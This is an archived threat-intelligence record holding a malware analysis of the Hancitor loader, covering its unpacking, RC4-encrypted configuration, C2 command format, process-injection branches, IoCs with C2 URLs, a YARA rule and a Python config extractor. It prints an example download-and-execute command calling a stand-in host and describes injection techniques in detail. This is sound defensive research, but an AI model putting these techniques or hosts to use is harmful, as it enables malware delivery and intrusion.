{
	"id": "73dd1ef4-63c4-4ea9-8978-4c51f05e62c3",
	"created_at": "2026-04-06T01:31:14.940896Z",
	"updated_at": "2026-04-10T03:24:24.466263Z",
	"deleted_at": null,
	"sha1_hash": "516ff5061fa2068af170a2abd3ef06a373583d0f",
	"title": "Hancitor Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 751091,
	"plain_text": "Hancitor Loader\r\nBy Nidal Fikri\r\nPublished: 2021-09-09 · Archived: 2026-04-06 00:43:10 UTC\r\nHancitor in a NutshellPermalink\r\nHancitor is a famous malware loader that has been in use for years since first being observed in 2015. A malware\r\nloader is the software which drops the actual malicious content on the system then executes the first stage of the\r\nattack. Hancitor has been the attacker’s loader of choice to deliver malwares like: FickerStealer, Sendsafe, and\r\nCobalt Strike if the victim characteristics are met. In recent months, more threat intelligence has been gathered to\r\nconfirm the selection of Hancitor by Cuba Ransomware gangs as well [1]. The popularity of Hancitor among\r\nthreat actors is considered to last for a while. Therefore, it’s crucial to assure your organization’s safety from this\r\nemerging threat.\r\nHancitor Infection VectorPermalink\r\nFigure(1): How Hancitor can sneak into your environment to download additional malwares.\r\nHancitor DLL is embedded within malicious documents delivered by phishing e-mails . The method that the\r\nmalicious document uses to achieve execution is usually a VBA macro that is executed when the document is\r\nopened. Being dropped by the doc file, the initial packed DLL is an intermediate stage responsible for unpacking\r\nand exposing the true functionality of Hancitor. Based on the collected information about the victim host, it will\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 1 of 13\n\ndecide which malware to deploy. Hancitor will then proceed to perform the loading functionality in order to infect\r\nthe system with the actual malicious content.\r\nTechnical SummaryPermalink\r\n1. Configuration Extraction: Hancitor comes with embedded RC4 encrypted configuration with hard-coded\r\nkey. It uses the Microsoft Windows CryptoAPI to do the decryption. These configuration contains the C2\r\nwhich it will communicate with for further commands.\r\n2. Host Profiling: Hancitor will gather information about the host in order to decide which malicious payload\r\nwill be downloaded as well as to generate a unique victim ID. For instance, if the host is connected to an\r\nactive directory domain, Cobalt Strike conditions are met. Collected information contains: OS version, IP\r\naddress, Domains trusts, Computer name \u0026 username.\r\n3. C2 Communication: The victim profile will be forwarded to the C2 to decide further orders. The returned\r\nC2 command is base64 encoded with additional layer of single-byte XOR encryption. The command\r\ndefines a set of 5 available loading techniques to be performed + a new URL to download the additional\r\nmalware to be loaded and executed.\r\n4. Payload Download: There are a lot of options to be selected. For example, Hancitor can download fully\r\ngrown malicious EXE or DLL files, or even tightly crafted shellcodes. There is high degree of flexibility\r\nhere that can serve a lot of threat actors which makes Hancitor a great choice.\r\n5. Malicious Code Execution: Whether it’s process injection or simply to drop on disk and execute the\r\nmalware, Hancitor is capable of performing the complex operation to ensure running that the malicious\r\ncode on the victim’s machine.\r\nTechnical AnalysisPermalink\r\nFirst look \u0026 UnpackingPermalink\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 2 of 13\n\nFigure(2): Results are at 2021-08-26 14:38:31 UTC. Different results may appear.\r\nCatching the initial dropped DLL by the malicious document and inspecting it, it is first seen at 2021-08-26\r\n14:38:31 UTC according to VirusTotal. At the given date, the file sample was flagged as malicious by only 6\r\nsecurity vendors.\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 3 of 13\n\nFigure (3): Before \u0026 After view of the memory dump.\r\nTo unpack the dropped DLL, we use X64dbg to set a breakpoint on VirtualAlloc API. After writing new data\r\ninto the allocated memory space, we set a hardware breakpoint on execution there. We continue single stepping\r\ninto the rest of the unpacking stub to assure the building of the import table. Then, we can spot a successfully\r\nunpacked PE header as well as many resolved strings in the newly allocated memory space. Finally, we dump the\r\nmemory section into disk.\r\nHost ProfilingPermalink\r\nFigure (4): All functions were labeled after RE.\r\nUsing IDA Pro we can see that unpacked Hancitor DLL has two exports which lead to the same function. From\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 4 of 13\n\nthere our static code analysis will begin. The malware functionality begins with host profiling. Collected\r\ninformation contains: OS version, Victim’s IP address, Domains names \u0026 DNS names, Computer name,\r\nusername, and whether the machine is x64 or x86.\r\nFigure(5): The malware uses GetAdaptersAddresses to obtain the required info.\r\nIt creates a unique ID for the victim using its MAC addresses of all the connected adapters XORed with the\r\nWindows directory volume serial number.\r\nFigure(6): check_if_x64 routine is used to determine if the victim machine is x64 or not.\r\nThen, it concatenates the final string which will hold the collected host information to be sent to the C\u0026C server.\r\nThe call to mw_wrap_config_decryption routine will be discussed in details in a few lines. It’s used to extract the\r\nembedded configuration which will also be used in the final host profile. Something that can be very useful while\r\nYARA rules is the format string {\"GUID=%I64u\u0026BUILD=%s\u0026INFO=%s\u0026EXT=%s\u0026IP=%s\u0026TYPE=1\u0026WIN=%d.%d\"} which\r\nmakes a good indicator for Hancitor . These collected characteristics about the infected host will decide which\r\nmalware will be deployed. For instance, if the host is connected to an active directory domain, Cobalt Strike\r\nmalware will be downloaded and executed.\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 5 of 13\n\nFigure(7): Hexadecimal representation of the data residing at the .data section.\r\nBut before finishing the host profile, the malware decrypts the embedded configuration in order to send a copy to\r\nthe C\u0026C server. The decryption routine references two global data variables very close the beginning of the .data\r\nsection. From the way the parameters are arranged for the decryption routine, I’ve concluded that the 8 bytes\r\nbeginning at 0x5A5010 are the decryption key followed by the encrypted configuration.\r\nFigure(8): You can use the MSDN documentation for more information about the APIs.\r\nHancitor comes with embedded RC4 encrypted configuration with hard-coded key. It uses the Microsoft Windows\r\nCryptoAPI to do the decryption. First, the key will be SHA-1 hashed before attempting the decryption. Then only\r\nthe first 5 bytes of the hashed key will be used to decrypt the encrypted data.\r\nThe upper 16 bits of the 4th parameter denotes the size of the RC4 decryption key. Here it’s 0x280011 =\r\n0000000000101000 -- 0000000000010001 in which 101000 = 40 bits or 5 bytes .\r\nFigure(9): Screen-shot from the actual decrypted configuration the malware uses.\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 6 of 13\n\nWe can use CyberChef to simulate the decryption process statically. First, the 8 bytes key {f0da08fe225d0a8f}\r\nwill be SHA-1 hashed = {67f6c6259f8f4ef06797bbd25edc128fd64e6ad7} . Then, the first 5 bytes of the key will be\r\nused as the final RC4 decryption key for decrypting the configuration data. These configuration contains the C2\r\nwhich it will communicate with for further commands based on the collected host profile. Here at the bottom right\r\ncorner, we can see that the malware comes with 3 C\u0026C servers to try to connect with. At the end of this report, we\r\nwill use another way to automatically extract the embedded configuration using Python.\r\nC\u0026C CommunicationPermalink\r\nFigure(10): The malware checks for 200 OK response before retrieving the C2 commands.\r\nHancitor extracts the C2 URLs and initializes the connection with the remote end using the high level\r\nWininet.dll library APIs. It uses the following hard-coded User-Agent {\"Mozilla/5.0 (Windows NT 6.1;\r\nWin64; x64; Trident/7.0; rv:11.0) like Gecko\"} which is very common.\r\nFirst, the collected host profile is sent using HTTP POST request. Secondly, it accepts the matched C2 command\r\nbased on the gathered information about the victim. The received C2 command is base64 encoded and XOR\r\nencrypted with a single-byte key 0x7A . The malware performs the necessary decoding before interpreting the\r\ncommand.\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 7 of 13\n\nThe command consists of 4 parts:\r\n1. A character from the set {'b','e','l','n','r'} to specify what action to be performed.\r\n2. The colon character : as delimiter.\r\n3. URL of the malicious content to be downloaded.\r\n4. The bar character | as delimiter.\r\n# i.e decoded command\r\n X:http://badsite.com/malware.exe|\r\nExecuting C2 CommandsPermalink\r\nFigure(11): Conditional code flows depending on the 1st character of the C2 command.\r\nAfter retrieving the C2 command and performing the appropriate decoding, the command is validated and then\r\npassed to the routing in which it will download and execute the malicious content. The malicious content will be\r\ndownloaded using the URL at offset 3 from the beginning of the C2 string. Then, based on the first character of the\r\nC2 command, one of the switch case branches will be executed.\r\nThere are 5 available options or executions paths. Excluding the n command because it simply acts as a NOP\r\noperation, so we have 4 valid options.\r\nThe ‘b’ CommandPermalink\r\nThis execution branch will perform a process injection in a newly created svchost.exe process with\r\nCREATE_SUSPENDED flag. The injected malicious code is first checked to be a valid PE file -DLL or EXE- in order\r\nto be injected. For the new suspended svchost.exe process, the injection is done in a classic way using the APIs:\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 8 of 13\n\nVirtualAllocEx and WriteProcessMemory . What is more interesting here is the way the malware sets the new\r\nEntry point for the malicious code.\r\nFigure(12): A thread context is a snapshot of processor-specific register data.\r\nIt changes the value of the EAX register and sets the new thread context overwriting the old one. The EAX\r\nregister in a newly created thread will always point to the OEP. This effectively transfers the entry point of the\r\nnewly created svchost.exe process to the start of the injected malicious binary.\r\nThe ‘e’ CommandPermalink\r\nFigure(13): lpStartAddress parameter is a wrapper function which calls the OEP of the binary.\r\nThe difference between this execution branch and the previous one is that this performs execution of the malicious\r\nbinary inside the currently running process without touching svchost.exe . First, Hancitor will perform PE\r\nheader parsing to find the ImageBase and AddressOfEntryPoint fields.\r\nThen, it will proceed to build the import table which will be used by the injected binary. It uses LoadLibraryA and\r\nGetProcAddress to do the job. That’s because the newly created thread will crash if it’s found to have\r\ndependencies problems. At last, based on function flags, the malware will decide to launch the newly downloaded\r\nmalicious in a new separate thread or simply just to call it as a function.\r\nThe ‘l’ CommandPermalink\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 9 of 13\n\nFigure(14): The functions flags are: arg_inject_svchost and arg_create_new_thread which decide the injection.\r\nHere the malware doesn’t check for valid PE file because it’s supposed to inject a shellcode. Based on the\r\nfunction’s flags, Hancitor will decide which to inject a newly created svchost.exe or to call the malicious\r\nshellcode as a function in the currently running process.\r\nThe malware doesn’t need to resume the suspended process because its only suspends the main thread. The\r\nmalware is creating another thread within svchost.exe to execute the malicious shellcode.\r\nThe ‘r’ CommandPermalink\r\nFigure(15): %TEMP% directory is used to store ephemeral temporary files.\r\nThis execution path is the only one that actually drops files on the disk. Hancitor will drop the newly downloaded\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 10 of 13\n\nmalicious binary in the %TEMP% directory with a random name beginning with the “BN” prefix. Then, if it’s an\r\nEXE file, it will simply execute it in a new process. If it’s a DLL file, it will use run32dll.exe to execute the\r\nmalicious DLL.\r\nConclusionPermalink\r\nHancitor is considered a straightforward loader but very efficient at the same time. So far, Hancitor has targeted\r\ncompanies of all sizes and in a wide variety of industries and countries to deploy very serious malwares like\r\nFickerStealer, Sendsafe, and Cobalt Strike or even Cuba Ransomware. It’s a must to take the appropriate\r\ncountermeasures to defend your organization from such dreadful threat. We can’t be sure which threat actors will\r\nalso use Hancitor as their loader in the future. Yet, one thing is sure: as effective as it has been to date, the threat\r\nposed by Hancitor will not fade away in the coming future.\r\nIoCsPermalink\r\nNo. Description Hash\r\n1\r\nThe initial\r\ndropped\r\nDLL\r\nEFBDD00DF327459C9DB2FFC79B2408F7F3C60E8BA5F8C5FFD0DEBAFF986863A8\r\n2\r\nThe\r\nunpacked\r\nDLL\r\n5E74015E439AE6AA7E0A29F26EF2389663EB769D25ABCEB636D8272A74F27B7F\r\n4\r\nHancitor\r\nC\u0026C\r\nServer 1\r\nhttp://intakinger.com/8/forum.php\r\n5\r\nHancitor\r\nC\u0026C\r\nServer 2\r\nhttp://idgentexpliet.ru/8/forum.php\r\n6\r\nHancitor\r\nC\u0026C\r\nServer 3\r\nhttp://declassivan.ru/8/forum.php\r\nYARA RulePermalink\r\nrule hancitor : loader\r\n{\r\nmeta:\r\ndescription = \"This is a noob rule for detecting unpacked Hancitor DLL\"\r\nauthor = \"Nidal Fikri @cyber_anubis\"\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 11 of 13\n\nstrings:\r\n$mz = {4D 5A} //PE File\r\n$s1 = \"http://api.ipify.org\" ascii fullword\r\n$s2 = /GUID=%I64u\u0026BUILD=%s\u0026INFO=%s(\u0026EXT=%s)?\u0026IP=%s\u0026TYPE=1\u0026WIN=%d\\.%d\\(x64\\)/ ascii fullword\r\n$s3 = /GUID=%I64u\u0026BUILD=%s\u0026INFO=%s(\u0026EXT=%s)?\u0026IP=%s\u0026TYPE=1\u0026WIN=%d\\.%d\\(x32\\)/ ascii fullword\r\n$s4 = \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\" ascii fullwo\r\ncondition:\r\n(filesize \u003c 500KB) and ($mz at 0) and (3 of ($s*))\r\n}\r\nThis python script is used to automatically extract the configuration of the Hancitor malware. Steps required are as\r\nfollows:\r\nOpen the binary file.\r\nGet the .data section.\r\nExtract the the key and the encrypted configuration data at offset 16.\r\nSHA-1 hash the extracted key to get the final key.\r\nUse the key to decrypt the configurations.\r\nimport pefile #To manipulate PE files\r\nimport hashlib #To perform the SHA-1 hashing\r\nimport binascii #To perfrom unhexing\r\nimport arc4 #To perform the RC4 decryption\r\n#This functions creates a PE object. Then iterates over the sections to locate\r\n#the .data section in order to return its content\r\ndef Get_Date_Section(file):\r\n pe_file = pefile.PE(file)\r\n for section in pe_file.sections:\r\n if b\".data\" in section.Name:\r\n return section.get_data()\r\ndef rc4_decryption(key, encrypted_data):\r\n cipher = arc4.ARC4(key)\r\n decrypted_content = cipher.decrypt(encrypted_data)\r\n extracted_config = decrypted_content[:200]\r\n print(extracted_config.decode('utf-8')) #Prints in Unicode\r\ndef main():\r\n file_path = input(\"Pls enter the file path: \")\r\n data_section = Get_Date_Section(file_path)\r\n #The config data begins at offset 16 inside the .data section\r\n full_configuration = data_section[16:]\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 12 of 13\n\n#The key is the first 8 bytes while the encrypted data is the rest\r\n key = full_configuration[0:8]\r\n data = full_configuration[8:]\r\n #The RC4 key is only the first 5 bytes = 10 hex digits\r\n hashed_key = hashlib.sha1(key).hexdigest()\r\n rc4_key = hashed_key[0:10]\r\n rc4_decryption(binascii.unhexlify(rc4_key),data)\r\nif __name__ == '__main__':\r\n main()\r\nRefrencesPermalink\r\nhttps://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon\r\nhttps://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8\r\nSource: https://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nhttps://cyber-anubis.github.io/malware%20analysis/hancitor/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cyber-anubis.github.io/malware%20analysis/hancitor/"
	],
	"report_names": [
		"hancitor"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775439074,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.pdf",
		"text": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.txt",
		"img": "https://archive.orkl.eu/516ff5061fa2068af170a2abd3ef06a373583d0f.jpg"
	}
}